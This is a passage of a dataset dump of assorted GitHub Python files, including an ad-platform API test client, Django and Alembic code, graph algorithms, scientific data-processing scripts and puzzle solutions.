self.session.cookies.get('mc') is None or self.session.cookies.get('mrcu') is None or self.session.cookies.get('sdc') is None:\n raise InvalidLoginException(\"Invalid login\")\n self.csrf_token=self.get_token()\n return response\n\n def post_image_id(self,repo_root):\n url_post = urljoin(self.base_url, 'api/v2/content/static.json')\n ImagePath = os.path.join(repo_root, 'fd.jpg')\n headers={\n 'X-CSRFToken': self.session.cookies.get('csrftoken')\n }\n file={\n 'width':(None,0),\n 'height':(None,0),\n 'file': ('fd.jpg', open(ImagePath, 'rb'), 'image/jpeg')\n }\n response=self._request('POST', url_post,headers=headers,files = file,jsonify=False)\n return {\n 'images':{\n 'id_static': response.json()['id']\n }\n }\n def post_url_id(self):\n url=urljoin(self.base_url, f'api/v1/urls/?url={credentials.CAMPAIGN_LING}')\n try:\n return self._request(\"GET\", url)['id']\n except:\n raise Invalid(f\"For url='{url}'\")\n\n\n def post_create_campaign(self, data: dict) -> dict:\n url = urljoin(self.base_url, \"/api/v2/campaigns.json\")\n\n headers = {\n 'Content-Type': 'application/json',\n 'X-CSRFToken': self.session.cookies.get(\"csrftoken\"),\n }\n return self._request('POST', url, json=data, headers=headers)\n\n def post_delete_segment(self, id):\n url_seg = urljoin(self.base_url, f'api/v2/remarketing/segments/{id}.json')\n\n headers = {\n 'X-CSRFToken': self.session.cookies.get('csrftoken')\n }\n\n return self._request('DELETE',url_seg,headers=headers,status=204,jsonify=False)\n","repo_name":"Shrced/2022-1-QAPYTHON-VK-M-Popov","sub_path":"homework3/api/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71099292852","text":"\"\"\"contract with offer_id\n\nRevision ID: dd84e0d9a675\nRevises: e56ef64e93d9\nCreate Date: 2019-07-09 08:11:21.726652\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'dd84e0d9a675'\ndown_revision = 'e56ef64e93d9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n\n op.add_column('contract', sa.Column('offer_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'contract', 'offer', ['offer_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'contract', type_='foreignkey')\n op.drop_column('contract', 'offer_id')\n\n # ### end Alembic commands ###\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"migrations/versions/dd84e0d9a675_contract_with_offer_id.py","file_name":"dd84e0d9a675_contract_with_offer_id.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6837843120","text":"from collections import defaultdict\nfrom heapq import heappop, heappush, heapify\nclass Solution:\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n \n graph = defaultdict(list)\n for u, v in tickets:\n graph[u].append(v)\n \n for u in graph.keys():\n heapify(graph[u])\n \n path = []\n def dfs(node):\n \n \n while graph[node]:\n adj = heappop(graph[node])\n dfs(adj)\n path.append(node)\n \n dfs(\"JFK\")\n return path[::-1]\n \n \n \n \n","repo_name":"zelzhan/Challenges-and-contests","sub_path":"LeetCode/reconstruct_itinerary.py","file_name":"reconstruct_itinerary.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17708353781","text":"import triangle\nimport triangle.plot\nimport matplotlib.pyplot as plt\n\nla = triangle.get_data('la')\n\nax1 = plt.subplot(311, aspect='equal')\ntriangle.plot.plot(ax1, **la)\n\nt = triangle.triangulate(la, 'pq')\nax2 = plt.subplot(312, sharex=ax1, sharey=ax1)\ntriangle.plot.plot(ax2, **t)\n\nt = triangle.triangulate(la, 'pqa')\nax2 = plt.subplot(313, sharex=ax1, sharey=ax1)\ntriangle.plot.plot(ax2, **t)\n\nplt.show()\n","repo_name":"Geodels/tribad","sub_path":"doc/plot/quality2.py","file_name":"quality2.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75197581493","text":"import sys\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nN, M = map(int, input().split())\ngraph = [[] for _ in range(N + 1)]\nfor _ in range(M):\n x, y = map(int, input().split())\n graph[x].append((y, 1))\n graph[y].append((x, 1))\n\nX, K = map(int, input().split())\n\ndef floyd_warshall():\n n = len(graph)\n dist = [[INF] * n for _ in range(n)]\n\n for i in range(1, n):\n dist[i][i] = 0\n\n for start, adjs in enumerate(graph):\n for adj, d in adjs:\n if dist[start][adj] > d:\n dist[start][adj] = d\n\n for k in range(1, n):\n for a in range(1, n):\n for b in range(1, n):\n dist[a][b] = min(dist[a][b], dist[a][k] + dist[k][b])\n\n return dist\n\nlist = floyd_warshall()\nprint(list[1][K] + list[K][X])","repo_name":"keeeeeey/baekjoon_algorithm","sub_path":"1. 이코테/chapter 09 (최단 경로)/미래 도시(floyd warshall).py","file_name":"미래 도시(floyd warshall).py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74336934133","text":"#! /usr/bin/env python3\n\n# This is solution to problem25 on projecteuler.net\n# This script just outputs the final answer\n\n\nenc = {} # A dictionary to contain the fibonacci numbers encountered\n\ndef fibo(n):\n nkey = str(n)\n if n == 1 or n == 2: # for n = 1, sequence values are defined to be 1\n enc.update({nkey:1})\n return 1\n else:\n if nkey in enc: # if the number is already encountered during recursion, use it\n # and don't bother with counting it again\n return enc[nkey]\n else: # if not, then calculate the number and store it for future use\n enc.update({nkey: fibo(n-1) + fibo(n-2)})\n return enc[nkey]\n\n# By a hunch, I think that it would take at least 1000 terms before \n# the length of number becomes 1000. But, the function is fast enough \n# for you to start the count from 1, or 100, your choice.\n\ncnt = 500\n\nwhile (len(str(fibo(cnt))) < 1000 ): # run the loop until the length of fibonacci number reaches 1000\n cnt += 1\n\nprint (f\"The required answer is: {cnt}\")\n","repo_name":"mandarvu/project_euler","sub_path":"python3/1000_digit_fibo_number.py","file_name":"1000_digit_fibo_number.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15728710153","text":"import sys\ninput = sys.stdin.readline\nn, k = map(int, input().split())\narr = []\nfor _ in range(n):\n arr.append(int(input().rstrip()))\n\nd = [0]*(k+1)\n\nd[0] = 1\n\nfor i in arr:\n for j in range(i, k+1):\n d[j] += d[j-i]\n\nprint(d[k])","repo_name":"rubenlee1998/Baekjoon","sub_path":"22.09.05~09.11/boj2293.py","file_name":"boj2293.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35693804078","text":"import requests\nfrom datetime import datetime\nimport csv\nimport time\n\ndef stream_data():\n ''' Function used to get the ticker data for BTC/INR from coindcx.com's website through their API\n and appends the data to a CSV file on disk '''\n\n url = \"https://api.coindcx.com/exchange/ticker\"\n\n fields = ['market', 'change_24_hour', 'high', 'low', 'volume', 'last_price', 'bid', 'ask', 'timestamp']\n\n # Create a 'write-only' file writer object\n with open('data.csv', 'w', newline='') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fields, extrasaction='ignore', dialect='excel')\n csv_writer.writeheader() # Makes a header with the 'fields' values\n\n '''Check to see if the entry has been recorded'''\n last_entry = dict()\n \n while True:\n # Append to writer object\n with open('data.csv', 'a', newline='') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fields, extrasaction='ignore', dialect='excel')\n \n response = requests.get(url)\n data = response.json()\n \n data_dict = data[0] # Get the values of the first entry in the list (BTC/INR)\n\n if data_dict == last_entry: # Checks to see if the data that is going to be added is already there\n continue # If the entry is already there - skip adding it\n else:\n last_entry = data_dict # Update the last entry record\n csv_writer.writerow(last_entry) # Write to the file\n print(last_entry.values()) # Prints out the entry to the consol\n \n \n time.sleep(1)\n\n\nif __name__ == '__main__':\n stream_data()\n\n \n\n\n\n\n","repo_name":"Xalt8/Crypto","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12189213620","text":"import os\nfrom glob import glob\n\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.data.datasets import load_coco_json\n\n\ndef register_fiber_instances(name, metadata, json_file, image_root):\n \"\"\"\n Register a dataset in COCO's json annotation format for\n fiber detection, i.e. mask, keypoint and fiber width detection.\n\n Args:\n name (str): the name that identifies a dataset, e.g. \"coco_2014_train\".\n metadata (dict): extra metadata associated with this dataset. You can\n leave it as an empty dict.\n json_file (str): path to the json instance annotation file.\n image_root (str): directory which contains all the images.\n \"\"\"\n DatasetCatalog.register(\n name,\n lambda: load_coco_json(\n json_file, image_root, name, extra_annotation_keys=[\"fiberwidth\", \"fiberlength\"]\n ),\n )\n MetadataCatalog.get(name).set(\n json_file=json_file, image_root=image_root, evaluator_type=\"coco\", **metadata\n )\n\n\ndef setup_dataset_catalog(data_root=\"/data\", verbose=0):\n\n json_paths = glob(os.path.join(data_root, \"**\", \"*.json\"))\n\n for json_path in json_paths:\n image_root = os.path.dirname(json_path)\n data_set_name = os.path.splitext(os.path.basename(json_path))[0]\n\n register_fiber_instances(data_set_name, {}, json_path, image_root)\n\n if verbose > 0:\n print(f\"Registered dataset: {data_set_name}\")\n\n\ndef enhance_metadata(config):\n keypoint_names = [str(i) for i in range(1, config.MODEL.ROI_KEYPOINT_HEAD.NUM_KEYPOINTS + 1)]\n skeleton = [[i, i + 1] for i in range(1, config.MODEL.ROI_KEYPOINT_HEAD.NUM_KEYPOINTS)]\n keypoint_flip_map = []\n\n for dataset_name in config.DATASETS.TRAIN + config.DATASETS.TEST:\n metadata = MetadataCatalog.get(dataset_name)\n metadata.set(keypoint_names=keypoint_names)\n metadata.set(skeleton=skeleton)\n metadata.set(keypoint_flip_map=keypoint_flip_map)\n\n\ndef setup_data(config):\n setup_dataset_catalog()\n enhance_metadata(config)\n\n\nif __name__ == \"__main__\":\n setup_dataset_catalog(verbose=1)\n","repo_name":"maxfrei750/FibeR-CNN","sub_path":"fibercnn/data/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"15867089130","text":"from django import forms\nfrom .models import Product\n\nclass ProductForm(forms.ModelForm):\n\n title = forms.CharField(widget=forms.TextInput(attrs={\"placeholder\" : \"Title\"}))\n description = forms.CharField(widget=forms.TextInput(attrs={\"placeholder\" : \"Description\"}))\n\n class Meta:\n model = Product\n fields = ['title', 'category', 'vendor', 'image', 'description', 'specifications', 'tags', 'product_status', 'featured', 'sku', 'date','file']\n\n","repo_name":"zeus0911/Ideax_Kripples","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31745882065","text":"from .scored_entry import scored_entry\n\nclass filter():\n\n def __init__(self, definition):\n\n self._definition = self._cleanDefinition(definition)\n\n def score(self, entry):\n\n scored = scored_entry(entry)\n\n for key in self._definition:\n\n if key.lower() == 'author':\n score, matches = self._scoreList(self._definition[key], entry.authors)\n if score > 0:\n scored.hits['people'] = True\n scored.score += score\n scored.matched_authors = matches\n\n elif key.lower() == 'keyword':\n score, matches = self._scoreString(self._definition[key], entry.title)\n if score > 0:\n scored.hits['title'] = True\n scored.score += score\n scored.matched_title = matches\n\n score, matches = self._scoreString(self._definition[key], entry.abstract)\n if score > 0:\n scored.hits['abstract'] = True\n scored.score += score\n scored.matched_abstract = matches\n\n elif key.lower() == 'category':\n score, matches = self._scoreList(self._definition[key], entry.categories)\n if score > 0:\n scored.hits['category'] = True\n scored.score += score\n scored.matched_categories = matches\n\n elif key.lower() == 'collaboration':\n score, matches = self._scoreString(self._definition[key], entry.collaboration)\n if score > 0:\n scored.hits['group'] = True\n scored.score += score\n\n return scored\n\n\n def _cleanDefinition(self, definition):\n out = {}\n\n for part, keys in definition.items():\n out[part] = {}\n for key, value in keys.items():\n clean = self._sanitize(key)\n out[part][clean] = int(value)\n\n return out\n\n def _sanitize(self, str, returnIdx=False):\n REMOVE = [\n '-', '.', ',', '_', ':', ';',\n '[', ']', '(', ')', '{', '}',\n '^', '\\\\', '/', '\\'', '`', '\"', '´',\n '&', '$'\n ]\n REPLACE = {\n 'ä': 'a', 'ö': 'o', 'ü': 'u',\n 'é': 'e', 'è': 'e', 'à': 'a', 'â': 'a',\n }\n\n # Replace characters\n clean = str.translate(REPLACE)\n\n # Remoe characters\n index = []\n output = []\n\n for cc, char in enumerate(clean):\n if char not in REMOVE:\n output.append(char)\n index.append(cc)\n\n clean = ''.join(output).lower()\n\n if not returnIdx:\n return clean\n else:\n return clean, index\n\n\n def _scoreList(self, definition, values):\n score = 0\n matches = []\n\n for item in values:\n clean = self._sanitize(item)\n matched = False\n\n for key, value in definition.items():\n if key in clean:\n score += value\n matched = True\n\n if matched:\n matches.append(item)\n\n\n return score, matches\n\n def _scoreString(self, definition, string):\n clean, index = self._sanitize(string, returnIdx=True)\n\n score = 0\n matches = []\n\n for key, value in definition.items():\n if key in clean:\n score += value\n\n # Extract the match of the original (unsanitized) string\n start = clean.index(key)\n matches.append(string[index[start]:index[start+len(key)-1]+1])\n\n return score, matches\n","repo_name":"deragent/arXivFilter","sub_path":"arxiv_filter/arxiv/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23143428842","text":"import numpy as np\nimport cv2\n\ndef constant_padding(img, kernel, constant):\n ps = len(kernel)-1 # padding size\n\n ns = (img.shape[0]+ps,img.shape[1]+ps) # image + padding size in all borders\n # creates result image bigger than original full of constant values\n result = np.ones(ns)*constant\n p = int(ps/2)\n result[p:-p,p:-p] = img[:,:] # put the original image on the middle \n\n cv2.imwrite('constant_padding.png', result)\n\n\nimg = cv2.imread('baboon.png', 0)\nkernel = np.arange(11*11).reshape((11,11))\nconstant_padding(img,kernel, 0)\n","repo_name":"LeonardoRez/mo446-sc","sub_path":"convolution-and-filters/constant_padding_dev.py","file_name":"constant_padding_dev.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727971253","text":"## Script to compute mean diurnal cycle of SKT from IFS\n## E. Dutra June 2022 \n\nimport xarray as xr\nimport numpy as np\nimport gribscan\nimport os \nfrom netCDF4 import Dataset,num2date \nimport pandas as pd\nimport datetime as dt \nimport time\nimport sys\n\nimport matplotlib.pylab as plt\nimport matplotlib.cm as cm\nimport cmocean.cm as cmo\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nfrom scipy.interpolate import LinearNDInterpolator, NearestNDInterpolator\n\ndef gen_output(fout):\n # create output file \n if os.path.isfile(fout):\n os.remove(fout)\n nc = Dataset(fout,'w',format='NETCDF4')\n\n # create dimensions \n nc.createDimension('lat',len(lat_reg))\n nc.createDimension('lon',len(lon_reg))\n nc.createDimension('time',24)\n \n \n # create dimensions variables \n cvar = nc.createVariable('lat','f4',['lat',])\n cvar.units = \"degrees_north\"\n cvar.long_name = \"latitude\"\n cvar.standard_name = \"latitude\"\n cvar.axis= \"Y\" \n cvar[:] = lat_reg[:,0]\n \n cvar = nc.createVariable('lon','f4',['lon',])\n cvar.units = \"degrees_east\"\n cvar.long_name = \"longitude\"\n cvar.standard_name = \"longitude\"\n cvar.axis= \"X\" \n cvar[:] = lon_reg[0,:]\n \n cvar = nc.createVariable('time','i4',['time',])\n cvar.units = f\"hours since {YM.strftime('%Y-%m-%d')}T00:00:00\"\n cvar.long_name = \"time\"\n cvar.standard_name = \"time\"\n cvar.axis= \"T\"\n cvar.calendar = \"standard\"\n \n \n cvar = nc.createVariable('LST','f4',('time','lat','lon'),\n fill_value=ZFILL,zlib=True,complevel=6,\n least_significant_digit=2)\n cvar.long_name='LST'\n cvar.units='Celsius'\n \n cvar = nc.createVariable('FVALID','f4',('time','lat','lon'),\n fill_value=ZFILL,zlib=True,complevel=6,\n least_significant_digit=3)\n cvar.long_name='fraction of valid pixels in average'\n cvar.units='0-1'\n \n cvar = nc.createVariable('NSLOT','f4',('time',))\n cvar.long_name='total number of slots processed'\n cvar.units='-'\n \n return nc\n\ndef inter2D(xIN):\n nn_interpolation = NearestNDInterpolator(points_ifs, xIN)\n return nn_interpolation(lon_reg, lat_reg)\n\n#resol='tco2559-ng5' # or tco3999-ng5\n#resol='tco3999-ng5' # or tco3999-ng5\n#resol='tco1279-orca025' # \n#ddate=\"202005\"\n\n\nt0 = time.time()\nresol=sys.argv[1]\nddate=sys.argv[2]\n\nDFOUT=\"/scratch/b/b381666/SKT_DIAG/\"\nZFILL=-999\ntcc_min = 0.3\n\nYM = dt.datetime.strptime(ddate,\"%Y%m\")\n\n## Define output regular grid \nlon_reg, lat_reg = np.meshgrid(np.arange(-80,80.05,0.05), np.arange(80,-80.05,-0.05))\n\n## define output file \nfout = f\"{DFOUT}/NETCDF4_{resol}_LST_{ddate}.nc\"\nncOUT = gen_output(fout)\nncOUT.close()\nprint(f\"Saving to:{fout}\")\n\n\n## Load surface data with open_zarr() \n# json file was already prepared with gribscan-index and gribscan-build command line tools\nt0_ = time.time()\nif resol == 'tco1279-orca025':\n datazarr = \"/work/bm1235/a270046/cycle2-sync/tco1279-orca025/nemo_deep/ICMGGc2/json.dir/atm2d_v0.json\" \nelif resol == 'tco3999-ng5':\n datazarr='/work/bm1235/a270046/cycle2-sync/tco3999-ng5/ICMGGc2/json.dir/atm2d.json' \nelif resol == 'tco2559-ng5':\n datazarr = '/work/bm1235/a270046/cycle2-sync/tco2559-ng5/ICMGGall_update/json.dir/atm2d.json'\nprint(\"Loading: \",datazarr)\ndata = xr.open_zarr(\"reference::\"+datazarr, consolidated=False)\nprint(f\"loaded data list {datazarr} in {time.time()-t0_:.1f} sec\") \n\n\n## Get the grid \nmodel_lon = np.where(data.lon.values>180, data.lon.values-360, data.lon.values)\nmodel_lat = data.lat.values\n\n## Select region of interest \nreg = ( (model_lat>-81) & (model_lat<81) &\n (model_lon >-81) & (model_lon<81) )\nnpp = np.sum(reg)\npoints_ifs = np.vstack((model_lon[reg], model_lat[reg])).T\n\n## Main work \nndays = (YM.replace(month = YM.month % 12 +1, day = 1)-dt.timedelta(days=1)).day\n## Main loop on hours for diurnal cycle \nfor ih in range(24):\n t0H = time.time()\n nslotSTP = 0\n zAVG = np.zeros(npp,'f4')\n zVAL = np.zeros(npp,'i4')\n # loop on days of month \n for iday in range(ndays):\n slot = YM+dt.timedelta(days=iday)+dt.timedelta(hours=ih)\n nslotSTP = nslotSTP + 1\n print(\"loading\",slot)\n # load data into memory \n skt = data.skt.sel(time=slot)[reg] - 273.16\n tcc = data.tcc.sel(time=slot)[reg]\n \n # select only clear sky \n xOK = tcc <= tcc_min\n zVAL[xOK] = zVAL[xOK] + 1 \n zAVG[xOK] = zAVG[xOK] + skt[xOK]\n \n #compute averages \n zAVG = np.where(zVAL>0,zAVG / zVAL,ZFILL)\n zVAL = np.where(zVAL>0,zVAL/nslotSTP,0)\n \n # write to output \n ncOUT = Dataset(fout,'a',format='NETCDF4')\n ncOUT.variables['time'][ih] = ih\n ncOUT.variables['NSLOT'][ih] = nslotSTP\n \n ncOUT.variables['LST'][ih,:,:] = inter2D(zAVG)\n ncOUT.variables['FVALID'][ih,:,:] = inter2D(zVAL)\n \n print(f\"Processed {ddate} hour {ih} with {nslotSTP} slots in {time.time()-t0H:.1f} sec\") \n \n ncOUT.close()\nprint(f\"finished in {time.time()-t0:.1f} sec\") \n","repo_name":"nextGEMS/nextGems_Cycle2","sub_path":"skt_diurnal/process_ifs_skt.py","file_name":"process_ifs_skt.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"40065062237","text":"#!/usr/bin/env python\n\nimport os\nfrom typing import Dict, Type\n\nimport fire\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nimport tensorflow_hub as hub\nimport yaml\nfrom nptyping import NDArray\n\nfrom mldiag.services import Service\nfrom mldiag.session import DiagSession\nfrom mldiag.wrappers import txt_tfds_to_numpy, tf_model_to_service\n\n\ndef wrap_tfds_as_data(\n custom_config: Dict\n) -> NDArray:\n train_data, validation_data, test_data = tfds.load(\n name=\"imdb_reviews\",\n split=('train[:99%]', 'train[1%:]', 'test'),\n as_supervised=True,\n batch_size=custom_config[\"batch_size\"]\n )\n return txt_tfds_to_numpy(test_data.take(1))\n\n\ndef wrap_tf_model_as_service(model_path: str) -> Type[Service]:\n return tf_model_to_service(\n filepath=model_path,\n custom_objects={'KerasLayer': hub.KerasLayer}\n )\n\n\nclass DiagTextClassification(object):\n\n def __init__(self):\n # Load a config file\n config_path = os.path.join(os.path.dirname(__file__),\n \"config_text_classification.yaml\")\n with open(config_path) as file:\n self.custom_config = yaml.load(file, Loader=yaml.FullLoader)\n self._default_model_path = os.path.join(os.path.dirname(__file__),\n \"model.h5\")\n\n def run(self,\n model_path=None,\n report_path=None):\n if model_path is None:\n model_path = self._default_model_path\n # run diag session\n DiagSession(\n config=self.custom_config,\n eval_set=wrap_tfds_as_data(self.custom_config),\n service=wrap_tf_model_as_service(model_path),\n metric=tf.keras.metrics.BinaryAccuracy(),\n report_path=report_path\n ).run()\n\n\ndef main():\n fire.Fire(DiagTextClassification)\n\nif __name__ == '__main__':\n main()\n","repo_name":"S-AI-F/MLDiag-1","sub_path":"examples/text_classification/tf_text_classification_diag.py","file_name":"tf_text_classification_diag.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42416955956","text":"def articulation_points(graph, n):\n vis = [0]*n\n tin = [0]*n\n low = [0]*n\n pts = set()\n\n def dfs(node, parent, timer):\n\n vis[node] = 1\n tin[node] = low[node] = timer\n timer += 1\n\n child = 0\n\n for neigh in graph[node]:\n if parent == neigh:\n continue\n\n if vis[neigh] == 0:\n dfs(neigh, node, timer)\n\n low[node] = min(low[node], low[neigh])\n if parent != -1 and low[neigh] >= tin[node]:\n pts.add(node)\n child += 1\n else:\n low[node] = min(low[node], tin[neigh])\n\n if parent == -1 and child > 1:\n pts.add(node)\n\n timer = 0\n for i in range(n):\n\n if vis[i] == 0:\n dfs(i, -1, timer)\n\n print(pts)\n\n\ngraph = {\n 0: [1, 13],\n 1: [0, 2, 4],\n 2: [1, 3],\n 3: [2, 4],\n 4: [1, 5],\n 5: [4, 6],\n 6: [7, 9],\n 7: [6, 8],\n 8: [7, 10, 9],\n 9: [6, 8],\n 10: [8, 11, 12],\n 11: [10, 12],\n 12: [10, 11],\n 13: [0],\n}\n\narticulation_points(graph, 14)\n","repo_name":"AlokPratapSingh22/Algos","sub_path":"Graphs/articulation_pt.py","file_name":"articulation_pt.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70728851254","text":"# qr.py : QR分解法\r\nimport numpy as np\r\nimport scipy.linalg as sclinalg\r\n# 時間計測\r\nimport time\r\n\r\n\r\n# QR分解法\r\ndef qr(mat_a, rtol, atol, max_times):\r\n row_dim, col_dim = mat_a.shape\r\n if row_dim != col_dim:\r\n return 0, 0\r\n\r\n dim = row_dim\r\n\r\n rq = mat_a\r\n old_diagonal = np.array([mat_a[i, i] for i in range(dim)])\r\n\r\n # メインループ\r\n for times in range(max_times):\r\n # QR分解\r\n q, r = sclinalg.qr(rq, pivoting=False)\r\n # RQ生成\r\n rq = r @ q\r\n\r\n if times % 10 == 0:\r\n print('times = ', times)\r\n print(rq)\r\n\r\n new_diagonal = np.array([rq[i, i] for i in range(dim)])\r\n diff_diagonal = new_diagonal - old_diagonal\r\n\r\n # 収束判定\r\n if np.linalg.norm(diff_diagonal) <= (rtol * np.linalg.norm(new_diagonal) + atol):\r\n break\r\n\r\n old_diagonal = new_diagonal\r\n\r\n return rq, times\r\n\r\n\r\n# 行列サイズ\r\nstr_dim = input('正方行列サイズ dim = ')\r\ndim = int(str_dim) # 文字列→整数\r\n\r\n# (1)\r\nmat_a = np.zeros((dim, dim))\r\nfor i in range(dim):\r\n for j in range(dim):\r\n mat_a[i, j] = float(dim - max(i, j))\r\n\r\nprint('mat_a = \\n', mat_a)\r\n\r\n# QR分解法実行\r\nstart_time1 = time.time()\r\nqr, iterative_times = qr(mat_a, 1.0e-15, 0.0, 51)\r\ntime1 = time.time() - start_time1\r\n\r\nprint('QR: iteration, time = ', iterative_times, time1)\r\nprint(' i eigenvalues ')\r\nfor i in range(dim):\r\n print(f'{i:2d} {qr[i, i]:25.17e}')\r\n\r\n\r\n# -------------------------------------\r\n# Copyright (c) 2021 Tomonori Kouya\r\n# All rights reserved.\r\n# -------------------------------------\r\n","repo_name":"tkouya/inapy","sub_path":"chapter09/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"187065602","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy import Field, Item\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import MapCompose, TakeFirst\n\n\nclass GtrendsScraperItem(Item):\n title = Field()\n publisher = Field()\n since_published = Field()\n time_scraped = Field()\n story = Field()\n link = Field()\n\n\nclass GtrendsItemLoader(ItemLoader):\n default_input_processor = MapCompose(unicode.strip)\n default_output_processor = TakeFirst()\n \n time_scraped_in = MapCompose(\n lambda x: unicode(x).strip()\n )\n","repo_name":"ralphqq/trending_business_news_scraper","sub_path":"gtrends_scraper/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4596704675","text":"# 狄克斯特拉算法\ngraph = {}\ngraph['start'] = {}\ngraph['start']['a'] = 6\ngraph['start']['b'] = 2\ngraph['a'] = {}\ngraph['a']['fin'] = 1\ngraph['b'] = {}\ngraph['b']['a'] = 3\ngraph['b']['fin'] = 5\ngraph['fin'] = {} # 创建图的散列表\n\ninfinity = float('inf')\ncosts = {}\ncosts['a'] = 6\ncosts['b'] = 2\ncosts['fin'] = infinity # 创建开销表\n\nparents = {}\nparents['a'] = 'start'\nparents['b'] = 'start'\nparents['fin'] = None # 创建父节点表\n\nprocessed = [] # 处理过的节点\n\n\ndef find_lowest_cost_node(costs):\n lowest_cost = float('inf')\n lowest_cost_node = None\n\n for node in costs: # 遍历所有节点\n cost = costs[node]\n if cost < lowest_cost and node not in processed: # 开销更低且未被处理过\n lowest_cost = cost # 视其为开销最小的节点\n lowest_cost_node = node\n\n return lowest_cost_node\n\n\nnode = find_lowest_cost_node(costs)\nwhile node is not None:\n cost = costs[node]\n neighbors = graph[node]\n\n for n in neighbors.keys():\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost:\n costs[n] = new_cost\n parents[n] = node\n\n processed.append(node)\n node = find_lowest_cost_node(costs)\n\nprint(costs)\n\n\n\n\n","repo_name":"jszheng/PyChild","sub_path":"basic/python_Data_Structure/Dijkstra_algorithm.py","file_name":"Dijkstra_algorithm.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25567242498","text":"from django.urls import path\n\nfrom Course_reg import views as Cviews\nfrom . import views as Uviews\n\nurlpatterns = [\n path('', Uviews.index, name='index'),\n path('login', Uviews.login_view, name='login'),\n path('logout', Uviews.logout_view, name='logout'),\n path('register', Uviews.register_view, name='register'),\n path('enrolled', Uviews.enrolled_view, name='enrolled'),\n path('enroll', Uviews.enroll, name='enroll'),\n path('del_enroll', Uviews.del_enroll, name='del_enroll'),\n path('../Course_reg', Cviews.course, name='course')\n]","repo_name":"6310682577/cn331_as2","sub_path":"Course_registrations/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23842861215","text":"import uuid\nfrom django.db import models\n\n\n# Create your models here.\nclass ServiceType(models.Model):\n \"\"\"\n Class to save type of services\n Example:\n - Luz\n - Agua\n - Gas\n \"\"\"\n name = models.CharField(max_length=20)\n active = models.BooleanField(default=True)\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n def __str__(self):\n return self.name\n\n\nclass StatusPayable(models.Model):\n \"\"\"\n Class to save status of payable\n Example:\n - Paid\n - Pending\n - Rejected\n \"\"\"\n name = models.CharField(max_length=20)\n active = models.BooleanField(default=True)\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n def __str__(self):\n return self.name\n\n\nclass Payables(models.Model):\n \"\"\"\n Class to save payable record\n \"\"\"\n bar_code = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n status = models.ForeignKey('payment_tax_service.StatusPayable', 